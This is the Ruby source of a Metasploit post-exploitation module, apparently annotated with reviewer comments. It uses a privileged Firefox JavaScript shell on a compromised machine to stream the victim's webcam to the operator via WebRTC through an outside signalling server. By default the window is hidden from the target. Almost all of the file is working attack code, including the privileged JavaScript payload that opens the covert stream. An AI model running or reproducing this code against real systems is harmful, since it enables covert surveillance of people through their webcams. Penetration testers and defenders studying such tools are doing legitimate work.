##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
require 'json'
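# Post module: drives the target's webcam into a WebRTC video chat from a
# privileged Firefox JavaScript shell (a session obtained via one of the
# Firefox privilege-escalation exploits).
#
# Flow: a pre-built HTML "offerer" page (data/webcam/offerer.html, via
# Msf::Post::WebRTC#load_interface) is filled with the ICE/signalling server,
# a random channel name and a random offerer id, base64-encoded into a
# data: URL and opened with nsIAppShellService#openDialog on the target.
# The operator side then joins the same channel with connect_video_chat.
class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
  include Msf::Post::WebRTC

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell',
        'Description' => %q{
          This module allows streaming a webcam from a privileged Firefox Javascript shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'References' => [
          [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
        ],
        'DisclosureDate' => '2014-05-13'
      )
    )

    register_options([
      # Opens about:blank in the existing chat window instead of a new stream.
      OptBool.new('CLOSE', [false, 'Forcibly close previous chat session', false]),
      # When false the dialog is opened as '_self' so the target sees no new window.
      OptBool.new('VISIBLE', [false, 'Show a window containing the chat to the target', false]),
      # <= 0 means no automatic teardown (see js_payload).
      OptInt.new('TIMEOUT', [false, 'End the chat session after this many seconds', -1]),
      # NOTE(review): the default is a third-party signalling host reached over
      # plain ws:// (port 80); both peers' signalling traffic transits it and its
      # owner can observe/tamper with the session setup. Point this at a server
      # you control and confirm it is still reachable before relying on the default.
      OptString.new('ICESERVER', [true, 'The ICE server that sets up the P2P connection', 'wsnodejs.jit.su:80'])
    ])
  end

  # Entry point: pushes the offerer page to the target, then (unless CLOSE)
  # joins the chat from the operator side.
  def run
    unless os_check
      print_error 'Windows versions of Firefox are not supported at this time [RM #8810].'
      return
    end

    server = datastore['ICESERVER']
    # Random channel/offerer identifiers keep the session from being joined
    # by someone merely guessing a name on the shared signalling server.
    offerer_id = Rex::Text.rand_text_alphanumeric(10)
    channel = Rex::Text.rand_text_alphanumeric(20)

    result = js_exec(js_payload(server, offerer_id, channel))

    if datastore['CLOSE']
      print_status 'Stream closed.'
    elsif result.present?
      # The payload sends either "Streaming webcam..." or the caught exception.
      print_status result
      connect_video_chat(server, channel, offerer_id)
    else
      print_warning 'No response received'
    end
  end

  # Returns true when the target's Firefox user agent does not identify
  # Windows. NOTE(review): a nil reply from js_exec (no response) also yields
  # true here, so an unresponsive session is treated as "not Windows" and
  # run proceeds to js_exec, where the missing response is reported.
  def os_check
    user_agent = js_exec(%|
      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
    |)
    user_agent !~ /windows/i
  end

  # Builds the privileged JavaScript that opens the offerer page on the target.
  #
  # @param server [String] ICE/signalling server host:port (operator-supplied)
  # @param offerer_id [String] random id for this module's side of the chat
  # @param channel [String] random channel name shared with connect_video_chat
  # @return [String] JavaScript wrapped as (function(send){...})(this.send),
  #   which reports success or the caught exception through +send+
  def js_payload(server, offerer_id, channel)
    interface = load_interface('offerer.html')
    api = load_api_code

    # Block form: the substituted values are inserted verbatim. With a plain
    # replacement string, backslash sequences (\\, \0, \1 ...) in the
    # operator-supplied ICESERVER would be interpreted by gsub and silently
    # change what lands in the page. The values are still not HTML/JS-escaped;
    # they are operator-controlled, not target-controlled.
    interface.gsub!(/=SERVER=/) { server }
    interface.gsub!(/=CHANNEL=/) { channel }
    interface.gsub!(/=OFFERERID=/) { offerer_id }

    if datastore['TIMEOUT'] > 0
      # Navigating the chat window to about:blank tears down the stream.
      # NOTE(review): `api` is never referenced in the JavaScript returned
      # below, so as written this timeout (and load_api_code's output) does not
      # reach the target; confirm whether load_interface is expected to embed
      # it before relying on TIMEOUT.
      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000}); "
    end

    # CLOSE reuses the same window name and loads about:blank into it; otherwise
    # the offerer page is carried inline as a base64 data: URL (no file on disk).
    url = if datastore['CLOSE']
            '"about:blank"'
          else
            '"data:text/html;base64,"+html'
          end

    # A random window name makes the dialog a fresh, visible window; '_self'
    # keeps it out of the target's view.
    name = if datastore['VISIBLE']
             Rex::Text.rand_text_alphanumeric(10)
           else
             '_self'
           end

    %|
      (function(send){
        try {

          var AppShellService = Components
            .classes["@mozilla.org/appshell/appShellService;1"]
            .getService(Components.interfaces.nsIAppShellService);

          var html = "#{Rex::Text.encode_base64(interface)}";
          var url = #{url};
          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
          send("Streaming webcam...");

        } catch (e) {
          send(e);
        }
      })(this.send);
    |
  end
end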